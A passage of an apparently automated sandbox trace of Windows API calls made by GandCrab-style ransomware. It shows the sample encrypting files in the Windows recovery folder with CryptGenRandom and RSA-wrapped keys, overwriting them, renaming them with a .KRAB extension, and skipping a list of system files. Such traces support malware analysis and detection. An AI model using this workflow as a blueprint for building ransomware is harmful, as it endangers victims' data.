lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.183] ReadFile (in: hFile=0x370, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0042.197] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.197] WriteFile (in: hFile=0x370, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.200] ReadFile (in: hFile=0x370, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x6000, lpOverlapped=0x0) returned 1 [0042.207] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0xffffa000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.207] WriteFile (in: hFile=0x370, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x6000, lpOverlapped=0x0) returned 1 [0042.207] WriteFile (in: hFile=0x370, lpBuffer=0x3040000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3040000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0042.208] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.231] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.234] CloseHandle (hObject=0x370) returned 1 [0042.309] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.310] MoveFileW (lpExistingFileName="C:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "c:\\recovery\\windowsre\\boot.sdi"), lpNewFileName="C:\\Recovery\\WindowsRE\\boot.sdi.KRAB" (normalized: "c:\\recovery\\windowsre\\boot.sdi.krab")) returned 1 [0042.310] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.311] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0042.311] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0042.311] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0042.311] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Recovery\\WindowsRE\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Recovery\\WindowsRE\\d2ca4a08d2ca4dee3d.lock" [0042.311] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0042.311] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Recovery\\WindowsRE\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 50 [0042.311] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\d2ca4a08d2ca4dee3d.lock") returned 45 [0042.311] lstrlenW (lpString=".lock") returned 5 [0042.311] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0042.311] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0042.311] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.312] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.312] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0042.312] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0042.312] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0042.312] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Recovery\\WindowsRE\\KRAB-DECRYPT.txt") returned="C:\\Recovery\\WindowsRE\\KRAB-DECRYPT.txt" [0042.312] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0042.312] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Recovery\\WindowsRE\\KRAB-DECRYPT.txt.KRAB") returned 43 [0042.312] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\KRAB-DECRYPT.txt") returned 38 [0042.312] lstrlenW (lpString=".txt") returned 4 [0042.312] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0042.313] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0042.313] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.313] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\KRAB-DECRYPT.txt") returned 38 [0042.313] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\KRAB-DECRYPT.txt") returned 38 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0042.313] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0042.313] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.314] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0042.314] lstrcmpW (lpString1="ReAgent.xml", lpString2=".") returned 1 [0042.314] lstrcmpW (lpString1="ReAgent.xml", lpString2="..") returned 1 [0042.314] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="ReAgent.xml" | out: lpString1="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned="C:\\Recovery\\WindowsRE\\ReAgent.xml" [0042.314] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0042.314] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Recovery\\WindowsRE\\ReAgent.xml.KRAB") returned 38 [0042.314] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 33 [0042.314] lstrlenW (lpString=".xml") returned 4 [0042.314] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0042.314] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".xml ") returned 5 [0042.314] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.315] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 33 [0042.315] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 33 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="desktop.ini") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="autorun.inf") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntuser.dat") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="iconcache.db") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootsect.bak") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="boot.ini") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntuser.dat.log") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="thumbs.db") returned -1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="KRAB-DECRYPT.html") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="KRAB-DECRYPT.txt") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="CRAB-DECRYPT.txt") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntldr") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="NTDETECT.COM") returned 1 [0042.315] lstrcmpiW (lpString1="ReAgent.xml", lpString2="Bootfont.bin") returned 1 [0042.315] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0042.316] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0xf95f78) returned 1 [0042.316] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0042.316] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0042.317] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0042.317] CryptGenRandom (in: hProv=0xf95f78, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0042.317] CryptReleaseContext (hProv=0xf95f78, dwFlags=0x0) returned 1 [0042.317] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.317] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0xf96a18) returned 1 [0042.317] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0042.318] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0042.318] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0042.318] CryptGenRandom (in: hProv=0xf96a18, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0042.318] CryptReleaseContext (hProv=0xf96a18, dwFlags=0x0) returned 1 [0042.318] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.318] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0xf96908) returned 1 [0042.319] CryptImportKey (in: hProv=0xf96908, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xf8a0c8) returned 1 [0042.319] CryptGetKeyParam (in: hKey=0xf8a0c8, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0042.319] CryptEncrypt (in: hKey=0xf8a0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0042.319] GetLastError () returned 0x0 [0042.319] CryptDestroyKey (hKey=0xf8a0c8) returned 1 [0042.319] CryptReleaseContext (hProv=0xf96908, dwFlags=0x0) returned 1 [0042.319] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0xf96220) returned 1 [0042.320] CryptImportKey (in: hProv=0xf96220, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xf8a0c8) returned 1 [0042.320] CryptGetKeyParam (in: hKey=0xf8a0c8, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0042.320] CryptEncrypt (in: hKey=0xf8a0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0042.320] GetLastError () returned 0x0 [0042.320] CryptDestroyKey (hKey=0xf8a0c8) returned 1 [0042.320] CryptReleaseContext (hProv=0xf96220, dwFlags=0x0) returned 1 [0042.320] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "c:\\recovery\\windowsre\\reagent.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0042.325] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0042.325] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0042.325] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x411, lpOverlapped=0x0) returned 1 [0042.337] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfffffbef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.337] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x411, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x411, lpOverlapped=0x0) returned 1 [0042.337] WriteFile (in: hFile=0x320, lpBuffer=0x3040000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3040000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0042.338] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.343] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.344] CloseHandle (hObject=0x320) returned 1 [0042.344] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.345] MoveFileW (lpExistingFileName="C:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "c:\\recovery\\windowsre\\reagent.xml"), lpNewFileName="C:\\Recovery\\WindowsRE\\ReAgent.xml.KRAB" (normalized: "c:\\recovery\\windowsre\\reagent.xml.krab")) returned 1 [0042.345] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.345] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0042.346] lstrcmpW (lpString1="Winre.wim", lpString2=".") returned 1 [0042.346] lstrcmpW (lpString1="Winre.wim", lpString2="..") returned 1 [0042.346] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="Winre.wim" | out: lpString1="C:\\Recovery\\WindowsRE\\Winre.wim") returned="C:\\Recovery\\WindowsRE\\Winre.wim" [0042.346] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0042.346] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Recovery\\WindowsRE\\Winre.wim.KRAB") returned 36 [0042.346] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\Winre.wim") returned 31 [0042.346] lstrlenW (lpString=".wim") returned 4 [0042.346] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0042.346] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".wim ") returned 5 [0042.346] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.347] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\Winre.wim") returned 31 [0042.347] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\Winre.wim") returned 31 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="desktop.ini") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="autorun.inf") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="iconcache.db") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="bootsect.bak") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="boot.ini") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat.log") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="thumbs.db") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="KRAB-DECRYPT.html") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="KRAB-DECRYPT.txt") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="CRAB-DECRYPT.txt") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="ntldr") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="NTDETECT.COM") returned 1 [0042.347] lstrcmpiW (lpString1="Winre.wim", lpString2="Bootfont.bin") returned 1 [0042.347] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0042.347] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0xf95cd0) returned 1 [0042.348] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0042.348] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0042.348] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0042.348] CryptGenRandom (in: hProv=0xf95cd0, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0042.349] CryptReleaseContext (hProv=0xf95cd0, dwFlags=0x0) returned 1 [0042.349] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.349] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0xf95f78) returned 1 [0042.349] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0042.350] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0042.350] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0042.350] CryptGenRandom (in: hProv=0xf95f78, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0042.350] CryptReleaseContext (hProv=0xf95f78, dwFlags=0x0) returned 1 [0042.350] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.350] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0xf95f78) returned 1 [0042.351] CryptImportKey (in: hProv=0xf95f78, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xf8a0c8) returned 1 [0042.351] CryptGetKeyParam (in: hKey=0xf8a0c8, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0042.351] CryptEncrypt (in: hKey=0xf8a0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0042.351] GetLastError () returned 0x0 [0042.351] CryptDestroyKey (hKey=0xf8a0c8) returned 1 [0042.351] CryptReleaseContext (hProv=0xf95f78, dwFlags=0x0) returned 1 [0042.351] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0xf96908) returned 1 [0042.351] CryptImportKey (in: hProv=0xf96908, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xf8a0c8) returned 1 [0042.352] CryptGetKeyParam (in: hKey=0xf8a0c8, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0042.352] CryptEncrypt (in: hKey=0xf8a0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0042.352] GetLastError () returned 0x0 [0042.352] CryptDestroyKey (hKey=0xf8a0c8) returned 1 [0042.352] CryptReleaseContext (hProv=0xf96908, dwFlags=0x0) returned 1 [0042.352] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "c:\\recovery\\windowsre\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0042.353] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0042.353] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0042.354] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0042.431] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.431] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.434] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0042.629] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.629] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.631] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0042.648] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.648] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.651] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0042.740] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.740] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.743] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0042.759] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.759] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.769] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0042.785] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.785] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.807] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.106] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.106] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.115] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.265] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 